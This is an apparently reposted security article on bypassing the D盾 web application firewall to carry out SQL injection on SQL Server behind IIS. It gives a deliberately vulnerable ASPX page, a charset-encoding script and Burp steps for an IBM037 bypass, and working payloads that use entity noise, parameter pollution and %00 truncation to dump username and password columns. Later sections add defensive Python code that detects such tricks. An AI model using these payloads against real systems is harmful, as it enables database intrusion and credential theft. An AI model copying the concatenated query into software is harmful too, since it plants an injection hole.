Bypassing D盾: A Summary of SQL Injection WAF Bypasses

VSole 2021-12-15 07:42:34

SQL Server characteristics

Spaces can be replaced by other characters

select id,contents,time from news where news_id=1 ① union ② select ③ 1,2,db_name() ④ from ⑤ admin

(① to ⑤ mark the five spaces that can be substituted; the options for each position are listed below)
  • Position ①
      • Other control characters can replace the space: %01~%0F, %11~%1F
      • Comment sequences can be used: /**/, --+a%0d%0a
      • Arithmetic operators and numeric literal forms can be used: news_id=1.0, news_id=1e0, news_id=1-1
  • Position ②
      • Other control characters can replace the space: %01~%0F, %11~%1F
      • Comment sequences can be used: /**/, --+a%0d%0a
      • A plus sign + can replace the space: union+select
  • Position ③
      • Other control characters can replace the space: %01~%0F, %11~%1F
      • Comment sequences can be used: /**/, --+a%0d%0a
      • Arithmetic operators can be used: +, -, ~, . (note: -, ~ and . only work when the first column of the select list is numeric)
      • Parentheses () can replace the space: select(1),2,db_name()
  • Position ④
      • Other control characters can replace the space: %01~%0F, %11~%1F
      • Comment sequences can be used: /**/, --+a%0d%0a
      • Other bytes can be used: %80~%FF (requires an IIS server)
  • Position ⑤
      • Other control characters can replace the space: %01~%0F, %11~%1F
      • Comment sequences can be used: /**/, --+a%0d%0a
      • Other bytes can be used: %80~%FF (requires an IIS server)
      • A dot . can replace the space: from.users
      • Square brackets [] can replace the space: from[users]

Test environment

Database: SQL Server 2008 R2

Web server: IIS 7.5 (Chinese edition)

WAF: D盾_v2.1.6.1 [beta]

The target page's source is as follows: index.aspx

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
    private DataSet resSet = new DataSet();
    protected void Page_Load(object sender, EventArgs e)
    {
        String strconn = "server=.;database=test;uid=sa;pwd=admin";
        // Request.Params merges query string, form body and cookies; repeated names are joined with commas
        string id = Request.Params["id"];
        // Deliberately vulnerable: the id value is concatenated straight into the SQL text
        string sql = string.Format("select * from newss where id={0}", id);
        SqlConnection connection = new SqlConnection(strconn);
        connection.Open();
        SqlDataAdapter dataAdapter = new SqlDataAdapter(sql, connection);
        dataAdapter.Fill(resSet);
        DgData.DataSource = resSet.Tables[0];
        DgData.DataBind();
        // Echo the executed statement so the effect of each payload is visible
        Response.Write("执行语句:<br>" + sql);
        Response.Write("<br>结果为:");
    }
</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>SQLServer注入测试</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <asp:DataGrid ID="DgData" runat="server" BackColor="White" BorderColor="#3366CC"
            BorderStyle="None" BorderWidth="1px" CellPadding="4"
            HeaderStyle-CssClass="head" Width="203px">
            <FooterStyle BackColor="#99CCCC" ForeColor="#003399" />
            <SelectedItemStyle BackColor="#009999" Font-Bold="True" ForeColor="#CCFF99" />
            <PagerStyle BackColor="#99CCCC" ForeColor="#003399" HorizontalAlign="Left"
                Mode="NumericPages" />
            <ItemStyle BackColor="White" ForeColor="#003399" />
            <HeaderStyle CssClass="head" BackColor="#003399" Font-Bold="True" ForeColor="#CCCCFF"></HeaderStyle>
        </asp:DataGrid>
    </div>
    </form>
</body>
</html>

Bypass via unusual charset encodings

Bypass principle

HTTP protocol compatibility: the variety of HTTP charsets

The charset parameter of the Content-Type header is not only used in responses; it can be used in requests as well.

Common servers and the encodings they accept are listed below (columns: server, usable encodings, notes):

Server: Nginx, uWSGI-Django-Python3
Usable encodings: IBM037, IBM500, cp875, IBM1026, IBM273
Notes: Encode both parameter names and values; the server URL-decodes names and values, so the equals sign and & must be encoded in the charset (not URL-encoded).

Server: Nginx, uWSGI-Django-Python2
Usable encodings: IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424
Notes: Encode both parameter names and values; the server URL-decodes names and values; the equals sign and & must not be encoded in any way.

Server: Apache-TOMCAT8-JVM1.8-JSP
Usable encodings: IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025
Notes: Parameter names stay in their original form (URL-encoded as usual); the body works whether URL-encoded or not; the equals sign and & must not be encoded in any way.

Server: Apache-TOMCAT7-JVM1.6-JSP
Usable encodings: IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025
Notes: Parameter names stay in their original form (URL-encoded as usual); the body works whether URL-encoded or not; the equals sign and & must not be encoded in any way.

Server: IIS6, 7.5, 8, 10 - ASPX (v4.x)
Usable encodings: IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025
Notes: Parameter names stay in their original form (URL-encoded as usual); the body works whether URL-encoded or not; the equals sign and & must not be encoded in any way.

Test steps

We use the following script to convert the encoding:

# Python 2 script (uses urllib.unquote / urllib.quote_plus).
# Usage: python2 encode.py "id=1" IBM037
import urllib
import sys

params = sys.argv[1]
charset = sys.argv[2]

def paramEncode(params="id=1", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
    result = ""
    equalSign = "="
    ampersand = "&"
    # Some servers need the separators in the target charset as well (see the table above)
    if encodeEqualSign:
        equalSign = equalSign.encode(charset)
    if encodeAmpersand:
        ampersand = ampersand.encode(charset)
    params_list = params.split("&")
    for param_pair in params_list:
        # Split on the first "=" only, so a value containing "=" is kept intact
        param, value = param_pair.split("=", 1)
        if urldecodeInput:
            # Undo any URL encoding in the input before re-encoding it
            param = urllib.unquote(param).decode('utf8')
            value = urllib.unquote(value).decode('utf8')
        # Convert name and value to the target charset (EBCDIC for IBM037)
        param = param.encode(charset)
        value = value.encode(charset)
        if urlencodeOutput:
            # Percent-encode the resulting bytes so they survive the HTTP request
            param = urllib.quote_plus(param)
            value = urllib.quote_plus(value)
        if result:
            result += ampersand
        result += param + equalSign + value
    return result

print(paramEncode(params, charset))

Here we test with the IBM037 encoding.

The Chinese edition of Burp Suite needs its font type changed first.

Then capture the request with Burp Suite and send it to Repeater.

Change the request method to POST.

Add a charset field to the Content-Type header with the value ibm037:

Content-Type: application/x-www-form-urlencoded;charset=ibm037

Encode the parameters with the script:

python2 encode.py "id=1" IBM037
# returns %89%84=%F1

Change the request body to %89%84=%F1 and send it.

The query data is returned normally.

Next comes the SQL injection itself.

D盾 WAF bypassed successfully.
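The defensive counterpart of the steps above, as an added example that is not part of the original article: a Python 3 helper that decodes a form body the way a charset-honouring backend such as IIS/ASP.NET does (percent-decode to bytes first, then interpret the bytes in the charset declared in Content-Type), together with the policy check a WAF or application should apply before anything else: reject a declared charset that is not ASCII-compatible, since an inspector that percent-decodes as UTF-8 or Latin-1 can never see the same parameters the backend sees. The function names and the Latin-1 `inspector_view` (a stand-in for a WAF that ignores the declared charset) are assumptions made for illustration; the body `%89%84=%F1` is the one produced by the article's script.

```python
import urllib.parse

# Bytes 0x20-0x7E are the printable ASCII characters. A charset that maps these bytes to the
# same characters ASCII does is "ASCII-compatible"; EBCDIC code pages such as IBM037 are not.
ASCII_PROBE = bytes(range(0x20, 0x7F))


def declared_charset(content_type, default="utf-8"):
    """Return the charset parameter of a Content-Type header value, or the default."""
    for param in content_type.split(";")[1:]:
        name, _, value = param.strip().partition("=")
        if name.strip().lower() == "charset":
            return value.strip().strip('"').lower()
    return default


def charset_is_ascii_compatible(charset):
    """True when the codec exists and decodes printable ASCII bytes to the same characters."""
    try:
        return ASCII_PROBE.decode(charset) == ASCII_PROBE.decode("ascii")
    except (LookupError, UnicodeDecodeError):
        return False


def decode_form_body(raw_body, content_type, allow_non_ascii_charsets=False):
    """Decode an application/x-www-form-urlencoded body the way a charset-honouring backend
    (IIS/ASP.NET in the article) would: percent-decode to bytes, then apply the declared
    charset. With the default policy a non-ASCII-compatible charset is rejected instead.
    ('+'-as-space handling is left out: for EBCDIC bodies it is implementation-specific.)"""
    charset = declared_charset(content_type)
    if not charset_is_ascii_compatible(charset) and not allow_non_ascii_charsets:
        raise ValueError("refusing request body in non-ASCII-compatible charset %r" % charset)
    params = {}
    for pair in raw_body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        name_bytes = urllib.parse.unquote_to_bytes(name)
        value_bytes = urllib.parse.unquote_to_bytes(value)
        # strict decoding: malformed input raises rather than being silently replaced
        params[name_bytes.decode(charset)] = value_bytes.decode(charset)
    return params


def inspector_view(raw_body):
    """What an inspector that ignores the declared charset sees: percent-decoded as Latin-1.
    For the article's body this is opaque bytes, not the parameter 'id'."""
    return urllib.parse.unquote_to_bytes(raw_body).decode("latin-1")


if __name__ == "__main__":
    # Constructed request: the article's Content-Type header and the body its script produced.
    content_type = "application/x-www-form-urlencoded;charset=ibm037"
    body = b"%89%84=%F1"
    print("inspector sees:", repr(inspector_view(body)))
    print("backend sees:  ", decode_form_body(body, content_type, allow_non_ascii_charsets=True))
    try:
        decode_form_body(body, content_type)
    except ValueError as err:
        print("policy:        ", err)
```

The two decoders disagree exactly when the charset is not ASCII-compatible, which is why rejecting such charsets at the edge (or configuring the backend not to honour them) removes the whole class rather than chasing individual code pages from the table above.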

Bypass by combining D盾's data-cleansing defect with several rule characteristics

Bypass principle

Rule defect/characteristic: exploiting how D盾 cleanses data

The WAF has several built-in decoders; after multiple rounds of decoding, a bypass may result.

When the parameter value an attacker submits contains a lot of noise, such as many spaces, tabs, newlines, %0c, comments and so on, the WAF needs to cleanse it (to improve performance and keep the rules simple) and filter out the real attack data for inspection. If the cleansing is done incorrectly, however, the real attack portion is removed, what is then inspected no longer contains the attack vector, and the WAF is bypassed.

Rule defect/characteristic: the database accepts other characters in place of spaces

See the SQL Server characteristics above for the substitute characters.

Rule defect/characteristic: %00 is treated as end of input

In a URL, %00 represents ASCII 0, and ASCII 0 is reserved as a special character.

Rule defect/characteristic: HTTP parameter pollution

When the id parameter is submitted more than once, all of the values are received, joined by commas.

Test steps

Capture the request and change the request method.

Testing D盾's data-cleansing behaviour:

To defend against XSS, D盾 applies HTML entity encoding to special characters in submitted data.

So what happens if we submit data that is already entity-encoded?

Here the > is not decoded; instead the & is encoded.

We can use this behaviour: placing this string (&gt;, sent as %26%67%74%3b) between keywords bypasses rules that match several keywords together, such as union…select, order…by, /*…*/, '…' and so on.

Bypassing and 1=1

Note: 1.e can stand in for a space

id=1.eand/*%26%67%74%3b*/1=1

Bypassing order by

id=1 order/*%26%67%74%3b*/by 2

Bypassing union select

id=-1.eunion--%26%67%74%3b%0aselect NULL,NULL,NULL

Bypassing from

Bypassing from is where it takes some craft: here HPP and %00 truncation are used together.

id=-1.eunion--%26%67%74%3b%0aselect NULL,username,password/*%26%67%74%3b&id=%00%0d*/from users
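To show what an inspector has to do to see through the space substitutions listed under SQL Server characteristics and the cleansing defects described in this section, here is an added example that is not from the article and not D盾's code: a Python 3 canonicalizer that merges duplicate parameters the way ASP.NET's Request.Params does, replaces comments and control characters with single spaces (treating NUL as a separator, never as end of input), splits the `1.e` numeric-literal glue, and only then applies keyword signatures. `naive_match` is a deliberately simplified model of the failure modes the article describes (first value only, truncation at NUL, keywords required to be separated by plain whitespace, no comment stripping); it is an assumption used for contrast, not D盾's actual rule logic. The query strings in the usage are the article's own test payloads.

```python
import re
import urllib.parse

# SQL Server treats block comments, line comments and any byte 0x00-0x20 as separators,
# so the canonical form replaces all of them with one space before matching.
COMMENT_RE = re.compile(r"/\*.*?\*/|--[^\n]*(?:\n|$)", re.S)
SEPARATOR_RE = re.compile(r"[\x00-\x20]+")
# "1.e" followed by a letter: the parser reads a numeric literal, then a keyword.
NUMERIC_GLUE_RE = re.compile(r"(\d)\.e(?=[a-z])", re.I)

# Word boundaries (\b) rather than required whitespace, so "select(1)", "from.users" and
# "from[users]" are still recognised once separators have been normalised.
SIGNATURES = {
    "union select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "order by": re.compile(r"\border\s+by\b", re.I),
    "select from": re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S),
    "boolean tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
}


def merge_parameters(query_string):
    """Reassemble parameters the way ASP.NET's Request.Params does: every occurrence of a
    name is kept and duplicates are joined with commas (HTTP parameter pollution)."""
    merged = {}
    for name, value in urllib.parse.parse_qsl(query_string, keep_blank_values=True):
        merged[name] = merged[name] + "," + value if name in merged else value
    return merged


def canonicalize(value):
    """Collapse comments, control characters and numeric-literal glue to single spaces.
    NUL (%00) is just another separator here, not the end of the value."""
    value = COMMENT_RE.sub(" ", value)
    value = SEPARATOR_RE.sub(" ", value)
    value = NUMERIC_GLUE_RE.sub(r"\1 ", value)
    return value.strip()


def match_signatures(query_string):
    """Signature names that fire against the canonical form of each merged parameter."""
    hits = set()
    for value in merge_parameters(query_string).values():
        canon = canonicalize(value)
        for name, pattern in SIGNATURES.items():
            if pattern.search(canon):
                hits.add(name)
    return hits


def naive_match(query_string):
    """Assumed model of the failure modes described in the article: inspect only the first
    value of each parameter, stop at the first NUL, leave comments in place, and run the
    same signatures over the raw text."""
    first = {}
    for name, value in urllib.parse.parse_qsl(query_string, keep_blank_values=True):
        first.setdefault(name, value)
    hits = set()
    for value in first.values():
        value = value.split("\x00", 1)[0]
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add(name)
    return hits


if __name__ == "__main__":
    # The article's four test payloads, as they would arrive in the request.
    payloads = [
        "id=1.eand/*%26%67%74%3b*/1=1",
        "id=1 order/*%26%67%74%3b*/by 2",
        "id=-1.eunion--%26%67%74%3b%0aselect NULL,NULL,NULL",
        "id=-1.eunion--%26%67%74%3b%0aselect NULL,username,password/*%26%67%74%3b&id=%00%0d*/from users",
    ]
    for qs in payloads:
        print(repr(canonicalize(",".join(merge_parameters(qs).values()))))
        print("  naive:", sorted(naive_match(qs)), " canonical:", sorted(match_signatures(qs)))
```

The point of the ordering is that every transformation mirrors something the database parser does (comments and control bytes are whitespace, duplicate parameters are concatenated by the framework, `1.e` ends a literal); a cleansing step that does anything else, such as entity-encoding or truncating at NUL before matching, inspects a string the backend never executes.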
Original author: Ulysses
Internal student submission

This work is licensed under the CC License; reposts must credit the author and link to this article.